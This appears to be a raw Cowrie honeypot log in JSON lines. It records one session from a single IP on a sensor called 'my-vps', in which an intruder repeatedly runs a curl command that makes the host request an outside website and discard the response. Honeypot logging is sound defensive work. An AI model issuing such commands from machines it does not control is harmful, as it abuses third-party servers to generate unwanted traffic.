{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.208542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.209493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.248444Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.249574Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.288606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.289757Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.328077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.329255Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.368932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.370125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.412596Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.413557Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.453162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.454092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.491734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.492647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.531065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.531976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.569171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.570307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.608002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.608963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.648631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.649563Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.686549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.687846Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.725913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.726866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.765493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.767008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.806732Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.807620Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.844997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.845990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.882926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.883833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.959613Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.960578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:56.998911Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:56.999825Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.038932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.039942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.078022Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.079107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.116481Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.117439Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.154291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.155537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.195276Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.196188Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.234301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.235289Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.272847Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.273998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.312474Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.313418Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.352039Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.353081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.392747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.393671Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.431680Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.432382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.473927Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.474981Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.511876Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.512944Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.549834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.550860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.588924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.589946Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.630058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.631101Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.668767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.669771Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.711699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.712890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.751268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.752226Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.797060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.798036Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.837864Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.839050Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.885751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.886711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.924991Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.926034Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:57.964637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:57.965630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.005909Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.006931Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.047637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.048605Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.086304Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.087266Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.139056Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.140033Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.178852Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.180023Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.224880Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.225899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.263027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.263932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.301802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.302959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.339763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.340667Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.381484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.382398Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.421922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.423031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.504461Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.505438Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.542305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.543305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.582587Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.583552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.625563Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.626618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.671530Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.672880Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.713108Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.714031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.751480Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.752503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.791961Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.793595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.830648Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.831517Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.868246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
